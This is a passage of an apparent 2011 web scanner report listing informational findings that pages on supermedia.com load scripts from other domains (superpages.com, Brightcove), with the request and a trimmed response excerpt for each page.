Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Barter Network | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.304. https://www.supermedia.com/community/newsletter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /community/newsletter

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/newsletter HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:47 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Newsletter | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.305. https://www.supermedia.com/direct-mail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /direct-mail

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /direct-mail HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:04 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Direct Mail Advertising - Reach Local Customers with Direct Mail | SuperMedia.com Adverti
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.306. https://www.supermedia.com/direct-mail/call-tracking  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /direct-mail/call-tracking

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /direct-mail/call-tracking HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:38 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Call Tracking | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.307. https://www.supermedia.com/direct-mail/compare-direct-mail-options  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /direct-mail/compare-direct-mail-options

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /direct-mail/compare-direct-mail-options HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Compare Direct Mail Options | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.308. https://www.supermedia.com/direct-mail/postcards  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /direct-mail/postcards

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /direct-mail/postcards HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:21 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Direct Mail Postcards | SuperMedia.com Advertising</title>



...[SNIP]...
<!--
By use of this code snippet, I agree to the Brightcove Publisher T and C
found at http://corp.brightcove.com/legal/terms_publisher.cfm.
-->

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.309. https://www.supermedia.com/direct-mail/shared-card-packs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /direct-mail/shared-card-packs

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /direct-mail/shared-card-packs HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:32 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Shared Card Packs Mailers | SuperMedia.com Advertising</title>



...[SNIP]...
<!--
By use of this code snippet, I agree to the Brightcove Publisher T and C
found at http://corp.brightcove.com/legal/terms_publisher.cfm.
-->

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.310. https://www.supermedia.com/directory-options  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /directory-options

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /directory-options HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:17 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Directory Advertising Options | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.311. https://www.supermedia.com/domain-names  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /domain-names

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /domain-names HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:32:24 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Register a Domain Name | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.312. https://www.supermedia.com/ecommerce  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /ecommerce

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ecommerce HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:32:21 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Stores for Small Business Ecommerce | SuperMedia.com</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.313. https://www.supermedia.com/ecommerce/basic-ecommerce  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /ecommerce/basic-ecommerce

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ecommerce/basic-ecommerce HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Basic Online Stores for Ecommerce | SuperMedia.com</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.314. https://www.supermedia.com/ecommerce/compare-ecommerce-options  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /ecommerce/compare-ecommerce-options

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ecommerce/compare-ecommerce-options HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Compare Online Store Options | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.315. https://www.supermedia.com/ecommerce/getting-started  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /ecommerce/getting-started

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ecommerce/getting-started HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Getting Started with an Online Store | SuperMedia.com</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.316. https://www.supermedia.com/ecommerce/premium-ecommerce  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /ecommerce/premium-ecommerce

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ecommerce/premium-ecommerce HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Premium Online Stores for Ecommerce | SuperMedia.com</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.317. https://www.supermedia.com/ecommerce/unlimited-ecommerce  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /ecommerce/unlimited-ecommerce

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ecommerce/unlimited-ecommerce HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Unlimited Online Stores for Ecommerce | SuperMedia.com</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.318. https://www.supermedia.com/help  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:29:19 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Help | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.319. https://www.supermedia.com/help/account-information  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/account-information

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/account-information HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:34:32 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Account Information | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.320. https://www.supermedia.com/help/business-listings  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/business-listings

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/business-listings HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:34:39 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Business Listings | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.321. https://www.supermedia.com/help/direct-mail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/direct-mail

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/direct-mail HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/help/online-stores
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762124|check#true#1296760324; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:10:36 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 25224


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Ddirect Mail</title>


<link type="text/css" rel="st
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.322. https://www.supermedia.com/help/domains-email  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/domains-email

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/domains-email HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:34:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Domains and Email Help | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.323. https://www.supermedia.com/help/local-search-marketing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/local-search-marketing

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/local-search-marketing HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:34:50 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Search Marketing Help | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.324. https://www.supermedia.com/help/online-stores  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/online-stores

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/online-stores HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=_c086BB48A-27A9-FE95-CA40-0000B767F5C1_kD178CD9B-A35A-5925-4EF5-B8443B54EAB4
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
